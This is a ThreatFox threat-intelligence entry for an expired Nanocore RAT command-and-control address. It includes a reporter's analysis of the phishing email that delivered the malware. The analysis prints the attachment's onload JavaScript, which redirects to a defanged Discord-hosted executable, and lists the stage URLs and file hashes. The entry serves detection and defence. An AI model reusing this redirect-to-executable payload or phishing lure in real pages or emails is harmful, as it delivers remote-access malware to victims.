ThreatFox IOC Database
You are viewing the ThreatFox database entry for ip:port 107.173.60.45:54955.
Database Entry
This IOC expired
This IOC is an old IOC and hence has expired on 2025-12-16 01:15:01 UTC. We therefore refrain from exporting it into our datasets. As a result, this database entry is purely informational and has no impact.
| IOC ID: | 338453 |
|---|---|
| IOC: | 107.173.60.45:54955 |
| IOC Type : | ip:port |
| Threat Type : | botnet_cc |
| Malware: | Nanocore RAT |
| Malware alias: | Nancrat, NanoCore |
| Confidence Level : | Confidence level is high (100%) |
| ASN: | AS36352 AS-COLOCROSSING |
| Country: |  US |
| First seen: | 2022-01-26 05:37:05 UTC |
| Last seen: | 2023-09-27 18:39:16 UTC |
| UUID: | ff0a44e8-7e69-11ec-a824-42010aa4000a |
| Reporter |  AndreGironda |
| Reward | 5 credits from ThreatFox |
| Tags: | NanoCore |
| Reference: | https://tria.ge/220126-f2ypvahabm |
AndreGironda
MITRE T1566.001Date: 24 Jan 2022 17:30-18:00 -0600
Received: from ec2-54-190-122-137.us-west-2.compute.amazonaws.com ([54.190.122.137]:58197 helo=aerosoftint.com)
From: Accountant John <john-accountant@aerosoftint.com>
Subject: Request Quote from <removed recipient>
Message-ID: <20220124174126.B3A89908F0BC140D@aerosoftint.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0012_69607DD8.B7F4E8A2"
X-Get-Message-Sender-Via: 142-4-8-116.ipage.com: authenticated_id: john-accountant@aerosoftint.com
X-Authenticated-Sender: 142-4-8-116.ipage.com: john-accountant@aerosoftint.com
Return-Path: john-accountant@aerosoftint.com
Attachment Name: Request Quote.HTML
Attachment SHA256: ef733c4a6e537260493b7e922597b4bcbdcf4138dae761ae47c30aab32ebb95e
HTML/JavaScript Code --
<body onload="javascript:window.location[.]href='hXXps://cdn.discordapp[.]com/attachments/934342695831359538/935223865989300274/Request_Quote.exe';">
Stage 1 URL: hXXps://cdn.discordapp[.]com/attachments/934342695831359538/935223865989300274/Request_Quote.exe
Stage 1 Executable SHA256: 0473e6ff120bab9fa26ef8c0037f9917df6ac59d1ce08ba0d08fabb1f2fe664d
Unpacked DLL SHA256: 2c26fa066bf21dd098d73c67c326e2dff060066fd5dfec42e41df851a5b62150
Stage 2 URL: hXXps://cdn.discordapp[.]com/attachments/934342695831359538/934343586403713054/world.exe
Nanocore Executable SHA256: c5d68d3abd9d6f9b094ea1bdb064ca709cc54de13f86856c4ffe34c64148c87c
Malware Samples
The table below documents recent malware samples observed that are associated with this indicator of compromise (IOC).